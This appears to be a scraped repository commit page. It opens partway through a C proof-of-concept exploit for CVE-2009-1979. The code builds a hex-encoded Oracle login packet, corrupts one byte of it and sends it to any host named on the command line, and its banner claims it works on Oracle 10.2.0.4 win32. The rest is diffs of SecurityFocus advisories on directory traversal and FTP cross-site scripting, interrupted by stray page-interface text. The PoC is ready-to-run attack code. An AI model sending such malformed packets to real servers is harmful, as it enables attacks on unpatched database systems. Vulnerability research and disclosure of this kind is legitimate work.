"\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49"
|
||||
"\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55"
|
||||
"\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20"
|
||||
"\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27"
|
||||
"\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52"
|
||||
"\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49"
|
||||
"\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D"
|
||||
"\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52"
|
||||
"\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27"
|
||||
"\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52"
|
||||
"\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C"
|
||||
"\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27"
|
||||
"\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44"
|
||||
"\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41"
|
||||
"\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52"
|
||||
"\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45"
|
||||
"\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27"
|
||||
"\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41"
|
||||
"\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52"
|
||||
"\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54"
|
||||
"\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E"
|
||||
"\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53"
|
||||
"\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41"
|
||||
"\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48"
|
||||
"\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C"
|
||||
"\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54"
|
||||
"\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41"
|
||||
"\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53"
|
||||
"\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20"
|
||||
"\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49"
|
||||
"\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00"
|
||||
"\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F"
|
||||
"\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44"
|
||||
"\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42"
|
||||
"\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42"
|
||||
"\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55"
|
||||
"\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x00"
|
||||
,1318);
|
||||
|
||||
pkt1318[0x41]=0x80;
|
||||
|
||||
s_send (s, pkt1318, 1318);
|
||||
|
||||
assert (closesocket (s)==0);
|
||||
return true;
|
||||
}
|
||||
else
|
||||
{
|
||||
printf ("while connect(): select() returns zero\n");
|
||||
assert (closesocket (s)==0);
|
||||
return false;
|
||||
};
|
||||
};
|
||||
|
||||
void main(int argc, char * argv[])
|
||||
{
|
||||
|
||||
printf ("CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n");
|
||||
printf ("Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n");
|
||||
if (argv[1]==NULL)
|
||||
{
|
||||
printf ("use: %s <hostname>\n", argv[0]);
|
||||
return;
|
||||
};
|
||||
|
||||
try_host (argv[1]);
|
||||
};
|
|
@ -1,7 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/1839/info
|
||||
|
||||
|
||||
Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS) and Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
|
||||
Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS). This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
|
||||
|
||||
- The Agent services server on port 8100/tcp
|
||||
- The End Entity services server on port 443/tcp (Accessible through SSL)
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/1839/info
|
||||
|
||||
|
||||
Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS) and Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
|
||||
Acquiring access to known files outside of the web root is possible through directory traversal techniques in Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
|
||||
|
||||
- The Agent services server on port 8100/tcp
|
||||
- The End Entity services server on port 443/tcp (Accessible through SSL)
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
source: http://www.securityfocus.com/bid/31855/info
|
||||
|
||||
Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
|
||||
Mozilla Firefox 3 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
|
||||
|
||||
Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
source: http://www.securityfocus.com/bid/31855/info
|
||||
|
||||
Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
|
||||
Google Chrome 0.2.149 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
|
||||
|
||||
Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.
|
||||
|
Loading…
Add table
Reference in a new issue